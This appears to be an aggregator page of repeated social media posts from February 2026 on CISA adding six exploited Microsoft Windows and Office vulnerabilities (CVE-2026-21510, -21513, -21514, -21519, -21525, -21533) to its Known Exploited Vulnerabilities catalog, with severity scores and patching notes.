CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

CVE-2026-21513
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-10T21:51:48.077000

10 posts

Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.

0x3e4@cyberplace.social at 2026-02-10T22:45:42.000Z ##

🔐 CVE-2026-21513
CVE-2026-21513

Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.

📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21513
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

secdb at 2026-02-10T22:00:15.348Z ##

🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-21510 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21513 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21514 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21519 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21525 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21533 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

##

AAKL at 2026-02-10T21:44:38.176Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20

##

cisakevtracker@mastodon.social at 2026-02-10T19:01:22.000Z ##

CVE ID: CVE-2026-21513
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer at 2026-02-10T18:52:59.664Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

0x3e4@cyberplace.social at 2026-02-10T22:45:42.000Z ##

🔐 CVE-2026-21513
CVE-2026-21513

Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.

📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21513
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

AAKL@infosec.exchange at 2026-02-10T21:44:38.000Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20 #CISA #infosec #Microsoft #vulnerability

##

linux@activitypub.awakari.com at 2026-02-10T18:55:45.000Z ## Microsoft’s February 2026 Patch Tuesday Addresses 54 CVEs (CVE-2026-21510, CVE-2026-21513) 2 Critical 51 Important 1 Moderate 0 Low Microsoft addresses 54 CVEs in the February 2026 Patch Tuesday ...


Origin | Interest | Match ##

cisakevtracker@mastodon.social at 2026-02-10T19:01:22.000Z ##

CVE ID: CVE-2026-21513
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-02-10T18:52:59.000Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

CVE-2026-21514
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-10T21:51:48.077000

9 posts

Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.

0x3e4@cyberplace.social at 2026-02-10T22:45:42.000Z ##

🔐 CVE-2026-21514
CVE-2026-21514

Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.

📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21514
🛡️ CWE: CWE-807
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

secdb at 2026-02-10T22:00:15.348Z ##

🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-21510 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21513 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21514 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21519 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21525 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21533 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

##

AAKL at 2026-02-10T21:44:38.176Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20

##

cisakevtracker@mastodon.social at 2026-02-10T19:02:40.000Z ##

CVE ID: CVE-2026-21514
Vendor: Microsoft
Product: Office
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer at 2026-02-10T18:52:59.664Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

0x3e4@cyberplace.social at 2026-02-10T22:45:42.000Z ##

🔐 CVE-2026-21514
CVE-2026-21514

Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.

📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21514
🛡️ CWE: CWE-807
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

AAKL@infosec.exchange at 2026-02-10T21:44:38.000Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20 #CISA #infosec #Microsoft #vulnerability

##

cisakevtracker@mastodon.social at 2026-02-10T19:02:40.000Z ##

CVE ID: CVE-2026-21514
Vendor: Microsoft
Product: Office
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-02-10T18:52:59.000Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

CVE-2026-21519
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-10T21:51:48.077000

9 posts

Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.

0x3e4@cyberplace.social at 2026-02-10T22:45:41.000Z ##

🔐 CVE-2026-21519
CVE-2026-21519

Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.

📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21519
🛡️ CWE: CWE-843
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

secdb at 2026-02-10T22:00:15.348Z ##

🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-21510 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21513 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21514 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21519 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21525 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21533 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

##

AAKL at 2026-02-10T21:44:38.176Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20

##

cisakevtracker@mastodon.social at 2026-02-10T19:02:24.000Z ##

CVE ID: CVE-2026-21519
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer at 2026-02-10T18:52:59.664Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

0x3e4@cyberplace.social at 2026-02-10T22:45:41.000Z ##

🔐 CVE-2026-21519
CVE-2026-21519

Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.

📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21519
🛡️ CWE: CWE-843
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

AAKL@infosec.exchange at 2026-02-10T21:44:38.000Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20 #CISA #infosec #Microsoft #vulnerability

##

cisakevtracker@mastodon.social at 2026-02-10T19:02:24.000Z ##

CVE ID: CVE-2026-21519
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-02-10T18:52:59.000Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

